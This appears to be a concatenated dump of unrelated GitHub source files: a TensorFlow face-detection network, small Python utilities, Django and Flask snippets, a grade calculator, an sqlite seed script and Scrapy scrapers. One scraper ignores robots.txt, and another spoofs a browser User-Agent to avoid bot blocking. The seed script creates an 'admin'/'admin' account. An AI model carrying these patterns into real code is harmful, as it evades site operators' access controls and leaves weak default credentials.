tf.nn.conv2d(relu7, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv8')\r\n # relu8 = tf.nn.relu(conv8, name='relu8')\r\n\r\n conv9 = slim.conv2d(conv8, num_filters_list[1], [3, 3], 1, 'SAME')\r\n # conv9 = tf.nn.conv2d(relu8, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv9')\r\n # relu9 = tf.nn.relu(conv9, name='relu9')\r\n\r\n conv10 = slim.conv2d(conv9, num_filters_list[1], [3, 3], 1, 'SAME')\r\n # conv10 = tf.nn.conv2d(relu9, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1], padding='SAME',name='conv10')\r\n # relu10 = tf.nn.relu(conv10, name='relu10')\r\n\r\n conv11 = slim.conv2d(conv10, num_filters_list[1], [3, 3], 1, 'SAME',activation_fn=None)\r\n #conv11 = tf.nn.conv2d(relu10, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv11')\r\n conv11 = conv11 + conv9#为什么9有激活\r\n relu11 = tf.nn.relu(conv11)\r\n\r\n #relu17 shape = [batch_size, 59,59, 32 ]\r\n\r\n if deploy_flag:\r\n predict_score_1, predict_bbox_1 = loss_branch(relu11, 'conv11', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_1, loss_bbox_1 = loss_branch(relu11, 'conv11', mask= mask_1, label=label_1)\r\n #第一个分支结束\r\n\r\n conv12 = slim.conv2d(relu11, num_filters_list[2], [3, 3], 2, 'VALID')\r\n # conv12 = tf.nn.conv2d(relu11, [3, 3, num_filters_list[1], num_filters_list[2]], strides=[1,2,2,1], padding='VALID',name='conv12')\r\n # relu12 = tf.nn.relu(conv12, name='relu12')\r\n\r\n conv13 = slim.conv2d(conv12, num_filters_list[2], [3, 3], 1, 'SAME')\r\n # conv13 = tf.nn.conv2d(relu12, [3,3,num_filters_list[2], num_filters_list[2]], strides=[1,1,1,1],padding='SAME',name='conv13')\r\n # relu13 = tf.nn.relu(conv13, name='relu13')\r\n\r\n conv14 = slim.conv2d(conv13, num_filters_list[2], [3, 3], 1, 'SAME',activation_fn=None)\r\n #conv14 = tf.nn.conv2d(relu13, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],padding='SAME', name='conv14')\r\n conv14 = conv14 + conv12\r\n relu14 = tf.nn.relu(conv14)\r\n\r\n if deploy_flag:\r\n predict_score_2, predict_bbox_2 = loss_branch(relu14, 'conv14', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_2, loss_bbox_2 = loss_branch(relu14, 'conv14', mask= mask_2, label=label_2)\r\n #第2个分支结束\r\n\r\n conv15 = slim.conv2d(relu14, num_filters_list[2], [3, 3], 2, 'VALID')\r\n # conv15 = tf.nn.conv2d(relu14, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 2, 2, 1],\r\n # padding='VALID', name='conv15')\r\n # relu15 = tf.nn.relu(conv15, name='relu15')\r\n\r\n conv16 = slim.conv2d(conv15, num_filters_list[2], [3, 3], 1, 'SAME')\r\n # conv16 = tf.nn.conv2d(relu15, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv16')\r\n # relu16 = tf.nn.relu(conv16, name='relu16')\r\n conv17 = slim.conv2d(conv16, num_filters_list[2], [3, 3], 1, 'SAME', activation_fn=None)\r\n # conv17 = tf.nn.conv2d(relu16, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv17')\r\n conv17 = conv17 + conv15\r\n # relu17 = tf.nn.relu(conv17, name='relu17')\r\n relu17 = tf.nn.relu(conv17)\r\n\r\n\r\n if deploy_flag:\r\n predict_score_3, predict_bbox_3 = loss_branch(relu14, 'conv17', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_3, loss_bbox_3 = loss_branch(relu14, 'conv17', mask=mask_3, label=label_3)\r\n # 第3个分支结束\r\n\r\n conv18 = slim.conv2d(relu17, num_filters_list[2], [3, 3], 2, 'VALID')\r\n # conv18 = tf.nn.conv2d(relu17, [3, 
3, num_filters_list[1], num_filters_list[2]], strides=[1, 2, 2, 1],\r\n # padding='VALID', name='conv18')\r\n # relu18 = tf.nn.relu(conv18, name='relu18')\r\n\r\n conv19 = slim.conv2d(conv18, num_filters_list[2], [3, 3], 1, 'SAME')\r\n # conv19 = tf.nn.conv2d(relu18, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv19')\r\n # relu19 = tf.nn.relu(conv19, name='relu19')\r\n\r\n conv20 = slim.conv2d(conv19, num_filters_list[2], [3, 3], 1, 'SAME',activation_fn=None)\r\n # conv20 = tf.nn.conv2d(relu19, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv20')\r\n conv20 = conv20 + conv18\r\n relu20 = tf.nn.relu(conv20)\r\n\r\n if deploy_flag:\r\n predict_score_4, predict_bbox_4 = loss_branch(relu20, 'conv20', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_4, loss_bbox_4 = loss_branch(relu20, 'conv20', mask=mask_4, label=label_4)\r\n # 第4个分支结束\r\n\r\n if deploy_flag:\r\n net = tf.group(predict_score_1, predict_bbox_1,\r\n predict_score_2, predict_bbox_2,\r\n predict_score_3, predict_bbox_3,\r\n predict_score_4, predict_bbox_4)\r\n return net\r\n else:\r\n net = tf.group(loss_score_1, loss_bbox_1,\r\n loss_score_2, loss_bbox_2,\r\n loss_score_3, loss_bbox_3,\r\n loss_score_4, loss_bbox_4)\r\n total_loss = loss_score_1 + loss_bbox_1 + \\\r\n loss_score_2 + loss_bbox_2 + \\\r\n loss_score_3 + loss_bbox_3 + \\\r\n loss_score_4 + loss_bbox_4\r\n\r\n return total_loss #net, data_names, label_names\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n tf_img_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['input_h'], FLAGS['input_w'], 3],name='tf_img_batch')\r\n\r\n tf_mask1_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][0], FLAGS['feature_map_size_list'][0], 64],name='tf_mask_batch1')\r\n tf_mask2_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][1],FLAGS['feature_map_size_list'][1], 128],name='tf_mask_batch2')\r\n tf_mask3_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][2],\r\n FLAGS['feature_map_size_list'][2], 128],name='tf_mask_batch3')\r\n tf_mask4_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][3],\r\n FLAGS['feature_map_size_list'][3], 128],name='tf_mask_batch4')\r\n\r\n tf_label1_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][0],\r\n FLAGS['feature_map_size_list'][0], 64],\r\n name='tf_mask_label1')\r\n tf_label2_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][1],\r\n FLAGS['feature_map_size_list'][1], 128],\r\n name='tf_mask_label2')\r\n tf_label3_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][2],\r\n FLAGS['feature_map_size_list'][2], 128],\r\n name='tf_mask_label3')\r\n tf_label4_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][3],\r\n FLAGS['feature_map_size_list'][3], 128],\r\n name='tf_mask_label4')\r\n\r\n MiniBatch = GetMiniBatch()\r\n img_batch , mask_batch, label_batch = MiniBatch.PrepareMinibatch()\r\n #img_batch = np.reshape(img_batch,[16,480,480,3])\r\n\r\n global_step = tf.Variable(0, trainable=False, name='global_step')\r\n total_loss = inference(img_batch, mask_batch, label_batch)\r\n optimizer = tf.train.AdamOptimizer(0.001)\r\n train_op = 
optimizer.minimize(total_loss)\r\n step = 0\r\n with tf.Session() as sess:\r\n init_op = tf.global_variables_initializer()\r\n sess.run(init_op)\r\n\r\n\r\n while step < 1000:\r\n\r\n _, sum_loss = sess.run([train_op,total_loss], feed_dict={tf_img_batch:img_batch[0],\r\n tf_mask1_batch: mask_batch[0], tf_mask2_batch:mask_batch[1], \\\r\n tf_mask3_batch: mask_batch[2], tf_mask4_batch: mask_batch[3], \\\r\n tf_label1_batch: label_batch[0], tf_label2_batch: label_batch[1], \\\r\n tf_label3_batch: label_batch[2], tf_label4_batch: label_batch[3], \\\r\n })\r\n print('Total Loss : ',sum_loss)\r\n step += 1\r\n","repo_name":"guochen005X/GC_LFFD","sub_path":"Net_Work/infefence.py","file_name":"infefence.py","file_ext":"py","file_size_in_byte":14781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71404997906","text":"\n\n\n\nfilename = r'D:\\school\\machine learning\\ex3\\four_circle.txt'\nout_f = r'D:\\school\\machine learning\\ex3\\four_circle.csv'\n\ndata = []\nwith open(filename) as f:\n for line in f:\n new_line = line.split(\" \")\n row = ''\n for w in new_line:\n row += f'{w},'\n row = row[:len(row)-1]\n data += [row]\n print(data)\n\nwith open(out_f,'a+') as f:\n for line in data:\n f.write(line)\n","repo_name":"kolron/intro_to_ml","sub_path":"ex3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73041106705","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time: 2022/10/9\n# @Author: xuef\n# @File: get_all_case_files.py\n# @Desc: collect all test-case files\n\nimport os\n\n\ndef get_all_files(file_dir: str) -> list:\n \"\"\"\n :param file_dir: directory to walk for case files\n \"\"\"\n files_path = []\n if not os.path.exists(file_dir):\n raise FileNotFoundError('当前文件夹不存在')\n for root, dirs, files in os.walk(file_dir):\n for file in files:\n path = os.path.join(root, file)\n files_path.append(path)\n return files_path\n\n\n\n","repo_name":"xuefengji/py-api-automation","sub_path":"utils/file/get_all_case_files.py","file_name":"get_all_case_files.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"48"} +{"seq_id":"40551065293","text":"from django.urls import path\nfrom .views import * \n\nurlpatterns = [\n\n path('',HomeView.as_view(),name = 'TeacherHomeView'),\n path('post_create/',PostCreateView.as_view(),name = \"post_create\"),\n path('post_update/<int:pk>',PostUpdateView.as_view(),name = \"post_update\"),\n path('delete/<str:pk>',delete,name = 'delete'),\n \n\n]","repo_name":"urvisuthar85/task","sub_path":"teachers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34275685200","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.decomposition import PCA\n\niris_df = pd.read_csv(\"../data/iris.csv\", low_memory=False)\nfeatures = ['sepal length', 'sepal width'] \n\ntargets = ['Iris-setosa', 'Iris-versicolor', 'Iris-virginica']\ntarget_names = targets\niris_df.iris.replace(targets, [0, 1, 2], inplace=True)\n\nX = iris_df[features].values # matrix\ny = iris_df['iris'].values\n\npca = PCA(n_components=2)\nX_r = pca.fit(X).transform(X)\n\nprint('explained variance ratio with the first two components: %s for features %s'\n %
(str(pca.explained_variance_ratio_), features))\n\ncolors = ['r', 'g', 'b']\nmarkers = [\"*\", 'o', 'd']\nlw = 2\n\nfor color, marker, i, target_name in zip(colors, markers, [0, 1, 2], target_names):\n plt.scatter(X_r[y == i, 0], X_r[y == i, 1], color=color, marker=marker, alpha=.8, lw=lw,\n label=target_name)\nplt.legend(loc='best', shadow=False, scatterpoints=1)\nplt.title('2-component PCA of IRIS dataset with sepal length and width')\n\nplt.show()\n","repo_name":"bmoretz/Python-Machine-Learning","sub_path":"samples/ch08/iris_sepal_pca.py","file_name":"iris_sepal_pca.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35936036654","text":"import Averages, Assignments, GradesRegex\n\ndef prompt():\n print('\\nThis program will calculate the grade of all of your classes.')\n print(\"If you wish to view the changes, type M to go back to main screen.\")\n print('Typing any symbols below will give you more information.')\n print('Type > then the subject to see all the specific assignments a class.')\n print('Type + to add an assignment to a class.')\n print('Type - to delete an assignment from a class.')\n print('Type | to edit an assignment in a class.')\n print('Type quit to quit from program.')\n print('\\n')\n\ndef mainScreen():\n print('Averages for Each Class:')\n Assignments.readPaths()\n Averages.printAllClassAverages()\n print('\\n')\n\ndef classCondition(condition): # Checks condition if it's none or false\n if condition == None: # If none, then ran but was aborted\n pass\n else: # If false, didn't answer a right class\n print('Enter a class next time\\n')\n user_response = eContinue('?')\n return user_response # Does this with continue to avoid printing b_and_a\n\ndef eContinue(response): # Gets the user to manually continue, also gets a response\n while response != '':\n response = input('\\nPress Enter to continue.')\n prompt()\n response = input()\n return response#g\n\ndef viewPath():\n user_response = input('What class would you like to view?\\n')\n if user_response in Assignments.all_subjectsv2:\n Assignments.print_assignments(user_response)\n else:\n print('Enter a class next time\\n')\n\ndef addPath():\n print('Type abort to abort the action.')\n user_response = input('What class would you like to add to?\\n')\n if user_response in Assignments.all_subjectsv2:\n outcome = Assignments.adding_assignments(user_response)\n if outcome != False: # if false not returned, ran sucessfully\n print('Done')\n return True\n else:\n print('\\nAborted.')\n return None\n elif user_response == 'abort':\n print('\\nAborted.')\n return None\n else:\n return False\n\ndef editPath(): # Kinda follow delPath(), but changing dict keys no actually deleting them\n user_response = input('What class would you like to edit?\\n')\n for i in range(len(Assignments.all_subjectsv2)):\n if user_response == Assignments.all_subjectsv2[i]:\n Assignments.print_assignments(user_response)\n user_assignment = input('\\nType the assignment name you want to change(BE VERY SPECIFIC!):\\n')\n while len(user_assignment) < 4:\n user_assignment = input('\\nPlease enter more then 4 char for this to be accurate!\\n')\n outcome = GradesRegex.customRegex(user_assignment.title(), i, '|')\n if outcome == False: # If false, error occured\n print('Next time, enter a valid assignment.\\n')\n return None # So that it doesnt run b_and_a\n elif outcome == None:\n return None\n else:\n print('Grade changed.')\n return True # return 
true if no aborted, so that it runs b_and_a\n else:\n pass\n return False # Otherwise, user didn't input valid class\n\ndef delPath():\n user_response = input('What class\\'s assignment would you like to delete?\\n')\n for i in range(len(Assignments.all_subjectsv2)):\n if user_response == Assignments.all_subjectsv2[i]: # Remember, only runs if its ==\n Assignments.print_assignments(user_response)\n user_assignment = input('\\nType the assignment name you want to delete(BE VERY SPECIFIC!):\\n')\n while len(user_assignment) < 4:\n user_assignment = input('\\nPlease enter more then 4 char for this to be accurate!\\n')\n outcome = GradesRegex.customRegex(user_assignment.title(), i, '-')\n if outcome != True:\n if outcome == False:\n print('Next time, enter a valid assignment.\\n')\n elif outcome == None:\n print('\\nDeletion aborted.')\n return None\n else:\n print('\\nAssignment deleted.')\n return True\n else:\n pass\n return False\n\npaths = ['>', '+', '-', '|', 'M']\n\ndef start():\n prompt()\n mainScreen()\n user_response = input()\n while user_response != 'quit':\n if user_response in paths:\n if user_response != 'M':\n print('The classes have abbreivations w, e, a, c, s, pc, and p.')\n if user_response != '>':\n if user_response == '+':\n class_condition = addPath()\n if class_condition != True:\n user_response = classCondition(class_condition)\n continue # Avoids printing b_and_a\n else:\n pass\n elif user_response == '-': # Special, bc it deletes 1st\n class_condition = delPath() # so have to run b_and_a\n if class_condition != True:\n user_response = classCondition(class_condition)\n continue\n else:\n user_response = eContinue(user_response) # Can't run b_and_a\n continue # bc deletion from dict\n elif user_response == '|':\n class_condition = editPath()\n if class_condition != True:\n user_response = classCondition(class_condition)\n continue\n else:\n pass\n Averages.before_and_after() # Won't run if they aborted or error\n else: # If you're viewing, don't need to see before and after\n viewPath()\n user_response = eContinue(user_response) # Runs this if it's > | - +\n else:\n mainScreen()\n user_response = eContinue(user_response)\n else: # User entered something else\n print('\\nPlease look at the prompt again.')\n user_response = eContinue(user_response)\n","repo_name":"DNCHOW1/Python-Projects","sub_path":"GradeCalculator/Interactions.py","file_name":"Interactions.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30302364271","text":"\"\"\"Module for shared test classes.\"\"\"\nimport unittest\n\nfrom app import create_app\nfrom app.settings import TestConfig\nfrom bootstrap import bootstrap\n\n\nclass baseTest(unittest.TestCase):\n \"\"\"Class that holds common test methods.\"\"\"\n\n def setUp(self):\n \"\"\"Initialize app and test db.\"\"\"\n app, db = create_app(config_object=TestConfig)\n app.app_context().push()\n self.app = app.test_client()\n self.db = db\n bootstrap(app, db)\n\n def tearDown(self):\n \"\"\"Destroy test db.\"\"\"\n self.db.session.remove()\n self.db.drop_all()\n","repo_name":"HassenPy/udacity-fsnd-item-catalog","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31258250391","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport scrapy\nfrom scrapy.shell import inspect_response\nfrom scrapy.crawler 
import CrawlerProcess\r\nfrom scrapy.linkextractors import LinkExtractor\r\nfrom string import Template\r\nimport pandas as pd\r\n\r\nprocess = CrawlerProcess({'AUTOTHROTTLE_ENABLED': True, \r\n 'AUTOTHROTTLE_TARGET_CONCURRENCY': .20,\r\n 'HTTPCACHE_ENABLED': False, # remove for final scrape to get live data\r\n 'ROBOTSTXT_OBEY': False,\r\n 'USER_AGENT': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',\r\n 'FEEDS': {'../../../data/raw/artists_data.csv': {'format': 'csv'}},\r\n 'FEED_EXPORT_ENCODING': 'utf-8'})\r\n\r\nclass RymArtistSpider(scrapy.Spider):\r\n name = 'RymArtists'\r\n pages = list(range(1, 2)) # set to 25 once multipage is working\r\n start_yr = 1950\r\n stop_yr = 1951 # sb 25 eventually \r\n start_urls = [f\"https://rateyourmusic.com/charts/top/album/{year}/{page}\"\r\n for page in pages for year in range(1950,1951)]\r\n\r\n def parse(self, response):\r\n \"\"\"Parses yearly top album chart pages to obtain artists w/urls\"\"\"\r\n if response.status == 404:\r\n return \r\n artist_xp = r'//a[@class=\"artist\"]/'\r\n artist_name_xp = artist_xp + 'text()'\r\n artist_url_xp = artist_xp + '@href'\r\n artist_names = response.xpath(artist_name_xp).getall()\r\n artist_urls = response.xpath(artist_url_xp).getall()\r\n # scrapy doesn't crawl dups by default, but this will prefilter anyway\r\n artists_dct = {name: 'https://rateyourmusic.com' + url \r\n for name, url in zip(artist_names, artist_urls)}\r\n for artist, artist_url in artists_dct.items():\r\n yield scrapy.Request(artist_url, callback=self.artistparse,\r\n meta={'artist': artist})\r\n\r\n def artistparse(self, response):\r\n artist = response.meta.get('artist')\r\n album_url_xp = r'//a[has-class(\"album\")]/@href'\r\n albums = response.xpath(album_url_xp).getall()\r\n genres = response.xpath('//a[has-class(\"genre\")]/text()').getall()\r\n yield {'artist': artist,\r\n 'album_urls': albums,\r\n 'genres': genres}\r\n\r\nprocess.crawl(RymArtistSpider)\r\nprocess.start()\r\n","repo_name":"chrisoyer/music-review-pipeline","sub_path":"src/data/scrapy/artist_scrape.py","file_name":"artist_scrape.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5446398364","text":"#!/usr/bin/env python3\n\nimport sqlite3\n\n\nconnection = sqlite3.connect('master.db', check_same_thread=False)\ncursor = connection.cursor()\n\ncursor.execute(\n \"\"\"\n INSERT INTO \n users\n (\n username,\n password,\n profile,\n initial_balance,\n cur_balance\n ) \n VALUES\n (\n 'admin',\n 'admin',\n 'A',\n 0.00,\n 0.00\n );\n \"\"\"\n)\n\nconnection.commit()\ncursor.close()\nconnection.close()\n","repo_name":"fodisi/WebTrader","sub_path":"core/setup/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32272606349","text":"from flask_restplus import Resource, Namespace\nfrom flask_jwt_extended import (\n jwt_refresh_token_required,\n get_jwt_identity,\n create_access_token,\n)\n\n\nclass TokenRefresh(Resource):\n api = Namespace(\"School flask restplus\")\n\n @jwt_refresh_token_required\n @api.doc(responses={200: \"OK\"})\n def post(self):\n current_user = get_jwt_identity()\n new_token = create_access_token(identity=current_user, fresh=False)\n return {\"access_token\": new_token}, 
200\n","repo_name":"asrmarco13/school-flask-restful","sub_path":"resources/token_refresh.py","file_name":"token_refresh.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"43516959622","text":"# 정수 A를 B로 바꾸려고 한다. 가능한 연산은 다음과 같은 두 가지이다.\r\n#\r\n# 2를 곱한다.\r\n# 1을 수의 가장 오른쪽에 추가한다.\r\n# A를 B로 바꾸는데 필요한 연산의 최솟값을 구해보자.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nA, B = map(int, input().strip().split())\r\ncnt = 1\r\nwhile True:\r\n if A == B:\r\n break\r\n\r\n if B < A*2:\r\n cnt = -1\r\n break\r\n if B % 2 == 0:\r\n B //= 2\r\n cnt += 1\r\n else:\r\n if B % 10 == 1:\r\n B //= 10\r\n cnt += 1\r\n else:\r\n cnt = -1\r\n break\r\nprint(cnt)","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"10000~/16953.py","file_name":"16953.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25337635646","text":"# Normalize an entire file\n\nfrom os import environ\nimport numpy as np\nimport common\n\n# Load a f32 format file (mono) \nINFILE=environ[\"INFILE\"]\nOUTFILE=environ[\"OUTFILE\"]\n# W is number of samples over which to determine the normalization factor\nW=float(environ[\"W\"])\n\nx=np.fromfile(INFILE,dtype='float32')\ny=x-np.mean(x)\ny/=np.max(np.abs(x))\ny.tofile(OUTFILE)\n\n","repo_name":"mondaugen/audio_limiter","sub_path":"tools/all_normalize.py","file_name":"all_normalize.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"41871898335","text":"import torch\nfrom torch import nn\n\nimport rulelearn.algorithms.r2n.mask as wm\nfrom rulelearn.algorithms.r2n.base import RuleNetwork\n\n\nclass SimpleRuleNet(RuleNetwork):\n \"\"\"\n Class that assembles the rule network part of r2n. It initializes and configures the conjunction and disjunction layer. 
\n \"\"\"\n def __init__(self, n_conditions, n_rules, cooling=True):\n super(SimpleRuleNet, self).__init__()\n self.n_rules = n_rules\n self.n_conditions = n_conditions\n self.temp = 1\n self.cooling = cooling\n self.weightmask_1 = wm.SimpleWeightMask(self.n_rules, self.n_conditions, self.temp, self.cooling)\n self.weightmask_2 = wm.SimpleWeightMask(1, self.n_rules, self.temp, self.cooling)\n self.network = nn.Sequential(\n ConjunctionLayer(self.weightmask_1),\n DisjunctionLayer(self.weightmask_2),\n )\n\n def forward(self, x):\n return self.network(x)\n\n def extract_ruleset(self):\n ruleset = []\n w_conj = torch.heaviside(self.network[0].mask() - torch.tensor(0.5),\n torch.ones_like(self.network[0].mask()))\n w_disj = torch.heaviside(self.network[1].mask() - torch.tensor(0.5),\n torch.ones_like(self.network[1].mask()))\n for d_idx, d_weight in enumerate(torch.flatten(w_disj).tolist()):\n if d_weight > 0:\n rule = w_conj.tolist()[d_idx]\n if sum(rule) > 0:\n ruleset.append(rule)\n return ruleset\n\n def get_penalty(self):\n and_masks = self.network[0].mask()\n or_masks = self.network[1].mask()\n\n return (or_masks.sum() + and_masks.sum()) / self.n_rules\n\n def update_temp(self, temp):\n self.weightmask_1.set_temp(temp)\n self.weightmask_2.set_temp(temp)\n\n\nclass ConjunctionLayer(nn.Module):\n \"\"\"\n Conjuction layer (And layer)\n \"\"\"\n def __init__(self, mask):\n super(ConjunctionLayer, self).__init__()\n self.mask = mask\n\n def forward(self, x):\n neg_x = torch.ones_like(x) - x\n prod = torch.matmul(neg_x, torch.transpose(self.mask().float(), 0, 1))\n return torch.ones_like(prod) - torch.clamp(prod, max=1)\n\n\nclass DisjunctionLayer(nn.Module):\n \"\"\"\n Disjunction layer (OR layer)\n \"\"\"\n def __init__(self, mask):\n super(DisjunctionLayer, self).__init__()\n self.mask = mask\n\n def forward(self, x):\n return torch.clamp(torch.matmul(self.mask(), torch.transpose(x, 0, 1)), max=1)\n","repo_name":"IBM/rulelearn","sub_path":"rulelearn/algorithms/r2n/simple_rulenet.py","file_name":"simple_rulenet.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73717712146","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\n\n\ndef animate_ouragan(vision_data, n=0):\n fig = plt.figure()\n ims = []\n for i in range(vision_data.shape[1]):\n #Show the geopotential--> 0\n #Show altitude -->1\n data = vision_data[n, i, 0, 1]\n img = plt.imshow(data, animated=True)\n ims.append([img])\n\n ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True,\n repeat_delay=1000)\n return ani\n","repo_name":"leobix/hurricast","sub_path":"src/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"6506688767","text":"import requests\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom typing import List, Dict\n\n\n# helper functions to retrieve specific text in div elements\ndef findSquareFootage(element):\n try:\n result = element.find('strong').text\n except:\n result = 'null'\n return result\n\ndef determineRentalTerm(element):\n try:\n if (element['class'][1] == 'has-rental-term'):\n result='Rent per square footage'\n except:\n result = 'Annual fee'\n return result\n\ndef addProperties(response: 'requests.models.Response') -> List[Dict]:\n # Container for dictionary objects\n pageResults=[]\n\n 
# parse the response object\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n # find all tags with class matching address-container\n properties = soup.findAll(class_='address-container')\n price = soup.findAll(class_=['price has-rental-term', 'price'])\n characteristics = soup.findAll(class_='characteristics-cnt')\n\n # list comprehensions to use for generator expressions\n fullAddresses = [str.upper(x['data-address']) for x in properties]\n streetAddresses = [x.split(',')[0] for x in fullAddresses]\n\n # try to throw index error to test if there are results on this page\n try:\n fullAddresses[0]\n\n # generator functions for addProperties\n addressNumber = (x.split(' ')[0] for x in streetAddresses)\n addressStreet = (' '.join(x.split(' ')[1:-1]) for x in streetAddresses)\n streetSuffix = (x.split(' ')[-1] for x in streetAddresses)\n city = (x.split(',')[1] for x in fullAddresses)\n descriptions = (x['title'] for x in properties)\n prices = (x['data-price'] for x in price)\n rentType = (determineRentalTerm(x) for x in price)\n squarefeet = (findSquareFootage(x) for x in characteristics)\n\n while(True):\n try:\n entry = {\n 'adrno': next(addressNumber),\n 'adrstr': next(addressStreet),\n 'adrsuf': next(streetSuffix),\n 'city': next(city),\n 'description': next(descriptions),\n 'price': next(prices),\n 'rentType': next(rentType),\n 'sqft': next(squarefeet)\n }\n pageResults.append(entry)\n except StopIteration:\n print(\"Properties processed\")\n break\n except IndexError:\n print(\"No more results\")\n raise ValueError(\"Empty page. No properties to scrape!\")\n\n return pageResults\n \n\n# use this when dealing with data quality later\n# abbreviations = {'NORTH': 'N', 'WEST': 'W', 'EAST': 'E', 'SOUTH': 'S', 'HIGHWAY': 'HWY'}\n\ndef main():\n\n # container for all scraped properties\n results = {'properties': []}\n\n # Set user agent header field to prevent being blocked as bot\n headers = requests.utils.default_headers()\n headers.update({\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\n })\n\n # url for commercial properties website\n url = 'https://www.point2homes.com/US/Commercial-Properties-For-Lease/FL/Volusia-County.html'\n response = requests.get(url, headers=headers)\n\n # We don't want to use the append method. 
That would append a list of dicts to the list value of the properties key\n # Instead, we want to add the dict objects to a single list\n # Possible improvement: use itertools.chain() to add multiple objects from multiple lists to one list.\n # Or maybe use something like np.arr.flatten()\n results['properties'] = results['properties'] + addProperties(response)\n\n #iterate through all pages until list of addresses is empty\n pageNumber = 2\n while (response.status_code == 200):\n url = f'https://www.point2homes.com/US/Commercial-Properties-For-Lease/FL/Volusia-County.html?page={pageNumber}'\n response = requests.get(url, headers=headers)\n try:\n results['properties'] = results['properties'] + addProperties(response)\n print(\"Page number is: {}\".format(pageNumber))\n pageNumber = pageNumber + 1\n time.sleep(2)\n except ValueError as e:\n print(e)\n break\n\n return results\n\nif __name__=='__main__':\n main()","repo_name":"hall-alexander/volusia-county-socioeconomic-analysis","sub_path":"src/services/scrapCommercialProperties.py","file_name":"scrapCommercialProperties.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"646626137","text":"# Given a string S in which every position is a digit (0-9), scan all digits one by one from left to right\n# and insert either 'x' or '+' between them; write a program that finds the largest number that can be 